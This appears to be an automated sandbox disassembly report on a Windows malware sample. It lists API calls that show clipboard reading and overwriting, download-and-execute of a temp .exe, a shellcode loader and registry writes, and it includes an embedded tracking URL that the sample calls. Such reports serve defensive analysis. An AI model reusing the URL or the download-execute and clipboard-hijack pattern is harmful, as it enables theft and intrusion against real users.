42eac9 __Wcscoll 20 API calls 65791->65795 65792->65791 65794 42b24c GetLastError 65792->65794 65793->65788 65794->65791 65798 42b25b 65794->65798 65795->65788 65796->65791 65797 42b274 WideCharToMultiByte 65797->65789 65797->65798 65798->65788 65798->65789 65798->65797 65800 4032e9 Concurrency::details::_CancellationTokenState::_DeregisterCallback 65799->65800 65801 40467c 167 API calls 65800->65801 65802 403315 65801->65802 65803 40484d 167 API calls 65802->65803 65804 40333e 65803->65804 65805 40458c 26 API calls 65804->65805 65806 40334d 65805->65806 65807 403392 std::ios_base::_Ios_base_dtor 65806->65807 65808 40dde3 167 API calls 65806->65808 65809 4033ce Concurrency::details::_CancellationTokenState::_DeregisterCallback 65807->65809 65811 40c618 167 API calls 65807->65811 65810 403362 65808->65810 65809->65753 65810->65807 65812 40458c 26 API calls 65810->65812 65811->65809 65813 403373 65812->65813 65814 404c14 167 API calls 65813->65814 65814->65807 65816 403b97 Concurrency::details::_CancellationTokenState::_DeregisterCallback 65815->65816 65817 4042af 167 API calls 65816->65817 65818 403ba3 65817->65818 65819 403bc7 Concurrency::details::_CancellationTokenState::_DeregisterCallback 65818->65819 65820 4034fb 167 API calls 65818->65820 65819->65755 65820->65819 65822 404356 28 API calls 65821->65822 65823 40312c Hash 65822->65823 65823->65760 65825 403c2c Concurrency::details::_CancellationTokenState::_DeregisterCallback 65824->65825 65826 40c618 167 API calls 65825->65826 65827 403c4f 65826->65827 65828 4042af 167 API calls 65827->65828 65829 403c59 65828->65829 65831 403c9c Concurrency::details::_CancellationTokenState::_DeregisterCallback 65829->65831 65833 4034fb 167 API calls 65829->65833 65830 403c7a 65830->65831 65832 4046ca 167 API calls 65830->65832 65831->65762 65832->65831 65833->65830 65835 403cce __EH_prolog3_catch 65834->65835 65836 4042af 167 API calls 65835->65836 65838 403ce7 65836->65838 65837 4046ca 167 API calls 65839 403d70 Concurrency::details::_CancellationTokenState::_DeregisterCallback 65837->65839 65840 403d17 65838->65840 65841 40369f 40 API calls 65838->65841 65839->65765 65840->65837 65841->65840 65842->65763 65843->65763 65844->65770 65845->65708 65847 40cc2c _strlen 65846->65847 65853 40cbc7 65847->65853 65849 401704 65849->65711 65850->65718 65851->65726 65852->65718 65854 40cbfa 65853->65854 65856 40cbd6 BuildCatchObjectHelperInternal 65853->65856 65854->65856 65857 40cb5c 28 API calls 4 library calls 65854->65857 65856->65849 65857->65856 65866 40f22a EnterCriticalSection 65858->65866 65860 40def4 65861 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65860->65861 65862 40ced2 65861->65862 65863 40cec7 CloseHandle 65861->65863 65864 40ced6 GetCurrentThreadId 65862->65864 65863->65864 65864->65731 65865->65733 65866->65860 65876 431f5e GetLastError 65867->65876 65869 42e083 ExitThread 65870 42e0a1 65873 42e0ad CloseHandle 65870->65873 65874 42e0b4 65870->65874 65873->65874 65874->65869 65875 42e0c0 FreeLibraryAndExitThread 65874->65875 65877 431f77 65876->65877 65880 431f7d 65876->65880 65896 435111 11 API calls 2 library calls 65877->65896 65879 434d2a _Atexit 17 API calls 65881 431f8f 65879->65881 65880->65879 65882 431fd4 SetLastError 65880->65882 65883 431f97 65881->65883 65897 435167 11 API calls 2 library calls 65881->65897 65885 42e07f 65882->65885 65886 43346a _free 17 API calls 65883->65886 65885->65869 65885->65870 65895 4354f6 10 API calls 2 library calls 65885->65895 65888 431f9d 65886->65888 65887 431fac 65887->65883 65889 431fb3 65887->65889 65890 431fcb SetLastError 65888->65890 65898 431d4c 20 API calls _Atexit 65889->65898 65890->65885 65892 431fbe 65893 43346a _free 17 API calls 65892->65893 65894 431fc4 65893->65894 65894->65882 65894->65890 65895->65870 65896->65880 65897->65887 65898->65892 65899->65548 65900 40239e 65901 402561 PostQuitMessage 65900->65901 65902 4023b2 65900->65902 65906 40255f 65901->65906 65903 4023b9 DefWindowProcW 65902->65903 65904 4023d0 65902->65904 65903->65906 65905 4029f4 167 API calls 65904->65905 65904->65906 65905->65906

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                    • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                      • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                    • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                    • _strlen.LIBCMT ref: 00401749
                                                                                                    • _strlen.LIBCMT ref: 00401778
                                                                                                    • _strlen.LIBCMT ref: 004018BC
                                                                                                    • EmptyClipboard.USER32 ref: 004018D2
                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                    • CloseClipboard.USER32 ref: 0040193D
                                                                                                    • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                    • String ID: i
                                                                                                    • API String ID: 1583243082-3865851505
                                                                                                    • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                    • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                    • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                    • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                    • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                    • String ID: .exe$<$ShareScreen
                                                                                                    • API String ID: 3323492106-493228180
                                                                                                    • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                    • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                    • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                    • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 020C07CE
                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 020C07EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481462096.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_20c0000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3833638111-0
                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction ID: d96b2f4417ce84138222a2ad4c26a66549524e3a63614b9a8057f41c9d5a29bd
                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction Fuzzy Hash: 76F0C271500311AFE7203BF5988CB6F76EDAF49665F20023CE642910C0DB70E8059A60

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 95 43d35e-43d364 83->95 84->83 93 43d162-43d16b GetFileType 85->93 94 43d0f7-43d100 85->94 99 43d1b4-43d1b7 93->99 100 43d16d-43d19e GetLastError call 42ea93 CloseHandle 93->100 97 43d102-43d106 94->97 98 43d137-43d15d GetLastError call 42ea93 94->98 97->98 104 43d108-43d135 call 43cd0a 97->104 98->83 102 43d1c0-43d1c6 99->102 103 43d1b9-43d1be 99->103 100->83 111 43d1a4-43d1af call 42eac9 100->111 107 43d1ca-43d218 call 4396c7 102->107 108 43d1c8 102->108 103->107 104->93 104->98 117 43d21a-43d226 call 43cf1b 107->117 118 43d228-43d24c call 43cabd 107->118 108->107 111->83 117->118 125 43d250-43d25a call 4335cd 117->125 123 43d25f-43d2a2 118->123 124 43d24e 118->124 127 43d2c3-43d2d1 123->127 128 43d2a4-43d2a8 123->128 124->125 125->95 131 43d2d7-43d2db 127->131 132 43d35c 127->132 128->127 130 43d2aa-43d2be 128->130 130->127 131->132 133 43d2dd-43d310 CloseHandle call 43cd0a 131->133 132->95 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->132
                                                                                                    APIs
                                                                                                      • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                    • GetLastError.KERNEL32 ref: 0043D150
                                                                                                    • __dosmaperr.LIBCMT ref: 0043D157
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                                                    • GetLastError.KERNEL32 ref: 0043D16D
                                                                                                    • __dosmaperr.LIBCMT ref: 0043D176
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                    • GetLastError.KERNEL32 ref: 0043D312
                                                                                                    • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                    • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                    • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                    • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                    • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 160 4332d5 144->160 146->147 150 432f67-432f92 146->150 165 4332d0 call 42a59d 147->165 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->165 158 432fc3-432fc7 157->158 159 4332b9-4332bb 157->159 158->159 163 432fcd-432fd1 158->163 164 4332d8-4332dd 159->164 160->164 163->156 167 432fd3-432fea 163->167 165->160 170 433007-433010 167->170 171 432fec-432fef 167->171 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 170->175 176 43302e-433038 170->176 173 432ff1-432ff7 171->173 174 432ff9-433002 171->174 173->174 173->175 177 4330a3-4330bd 174->177 208 4331f0 175->208 179 43303a-43303c 176->179 180 43303f-43305d call 4336a7 call 43346a * 2 176->180 181 4330c3-4330d3 177->181 182 433191-43319a call 43d365 177->182 179->180 211 43307a-4330a0 call 4347ee 180->211 212 43305f-433075 call 42eac9 call 42eab6 180->212 181->182 185 4330d9-4330db 181->185 195 43320d 182->195 196 43319c-4331ae 182->196 185->182 189 4330e1-433107 185->189 189->182 193 43310d-433120 189->193 193->182 198 433122-433124 193->198 200 433211-433229 ReadFile 195->200 196->195 201 4331b0-4331bf GetConsoleMode 196->201 198->182 203 433126-433151 198->203 205 433285-433290 GetLastError 200->205 206 43322b-433231 200->206 201->195 207 4331c1-4331c5 201->207 203->182 210 433153-433166 203->210 213 433292-4332a4 call 42eac9 call 42eab6 205->213 214 4332a9-4332ac 205->214 206->205 215 433233 206->215 207->200 216 4331c7-4331e1 ReadConsoleW 207->216 209 4331f3-4331fd call 43346a 208->209 209->164 210->182 222 433168-43316a 210->222 211->177 212->208 213->208 219 4332b2-4332b4 214->219 220 4331e9-4331ef call 42ea93 214->220 226 433236-433248 215->226 217 4331e3 GetLastError 216->217 218 433202-43320b 216->218 217->220 218->226 219->209 220->208 222->182 229 43316c-43318c 222->229 226->209 233 43324a-43324e 226->233 229->182 237 433250-433260 call 432c45 233->237 238 433267-433272 233->238 247 433263-433265 237->247 240 433274 call 432d95 238->240 241 43327e-433283 call 432a85 238->241 248 433279-43327c 240->248 241->248 247->209 248->247
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                    • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                                                    • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                    • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 250 210003c-2100047 251 2100049 250->251 252 210004c-2100263 call 2100a3f call 2100e0f call 2100d90 VirtualAlloc 250->252 251->252 267 2100265-2100289 call 2100a69 252->267 268 210028b-2100292 252->268 273 21002ce-21003c2 VirtualProtect call 2100cce call 2100ce7 267->273 269 21002a1-21002b0 268->269 272 21002b2-21002cc 269->272 269->273 272->269 279 21003d1-21003e0 273->279 280 21003e2-2100437 call 2100ce7 279->280 281 2100439-21004b8 VirtualFree 279->281 280->279 282 21005f4-21005fe 281->282 283 21004be-21004cd 281->283 286 2100604-210060d 282->286 287 210077f-2100789 282->287 285 21004d3-21004dd 283->285 285->282 291 21004e3-2100505 LoadLibraryA 285->291 286->287 292 2100613-2100637 286->292 289 21007a6-21007b0 287->289 290 210078b-21007a3 287->290 294 21007b6-21007cb 289->294 295 210086e-21008be LoadLibraryA 289->295 290->289 296 2100517-2100520 291->296 297 2100507-2100515 291->297 298 210063e-2100648 292->298 299 21007d2-21007d5 294->299 302 21008c7-21008f9 295->302 300 2100526-2100547 296->300 297->300 298->287 301 210064e-210065a 298->301 303 2100824-2100833 299->303 304 21007d7-21007e0 299->304 305 210054d-2100550 300->305 301->287 306 2100660-210066a 301->306 307 2100902-210091d 302->307 308 21008fb-2100901 302->308 314 2100839-210083c 303->314 309 21007e2 304->309 310 21007e4-2100822 304->310 311 21005e0-21005ef 305->311 312 2100556-210056b 305->312 313 210067a-2100689 306->313 308->307 309->303 310->299 311->285 315 210056d 312->315 316 210056f-210057a 312->316 317 2100750-210077a 313->317 318 210068f-21006b2 313->318 314->295 319 210083e-2100847 314->319 315->311 321 210059b-21005bb 316->321 322 210057c-2100599 316->322 317->298 323 21006b4-21006ed 318->323 324 21006ef-21006fc 318->324 325 2100849 319->325 326 210084b-210086c 319->326 333 21005bd-21005db 321->333 322->333 323->324 327 210074b 324->327 328 21006fe-2100748 324->328 325->295 326->314 327->313 328->327 333->305
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0210024D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID: cess$kernel32.dll
                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                    • Instruction ID: aad6ab16f8a28cd0eb1489dbc57eebdc88624be26de041bf3cadf3bec6a1f088
                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                    • Instruction Fuzzy Hash: F4525974A01229DFDB64CF58C984BACBBB1BF09304F1580E9E54DAB391DB70AA95CF14

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                    • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                    • API String ID: 3067768807-1501832161
                                                                                                    • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                    • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                                                    • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                    • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                    • String ID:
                                                                                                    • API String ID: 1687354797-0
                                                                                                    • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                    • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                                                    • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                    • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                                                                    • __Cnd_signal.LIBCPMT ref: 00405828
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                    • String ID:
                                                                                                    • API String ID: 2059591211-0
                                                                                                    • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                    • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                                                                    • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                    • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastThread
                                                                                                    • String ID: F(@
                                                                                                    • API String ID: 1611280651-2698495834
                                                                                                    • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                    • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                                                                    • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                    • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 451 42e185-42e188 436->451 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 448 42e178-42e184 call 42e03d 443->448 446 42e189-42e18e 444->446 447 42e169-42e175 GetLastError call 42ea93 444->447 449 42e190-42e193 446->449 450 42e195-42e197 446->450 447->443 448->451 449->450 450->448
                                                                                                    APIs
                                                                                                    • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                                                                    • __dosmaperr.LIBCMT ref: 0042E170
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2744730728-0
                                                                                                    • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                    • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                                                                    • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                    • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 467 43477a-43477e 460->467 466 4347b3-4347c8 462->466 462->467 463->467 468 4347cd-4347d2 466->468 467->468
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                                                                    • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                                                                    • __dosmaperr.LIBCMT ref: 0043479F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2336955059-0
                                                                                                    • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                    • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                                                                    • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                    • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                                                                    APIs
                                                                                                    • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                                                                    • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1818849710-0
                                                                                                    • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                    • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
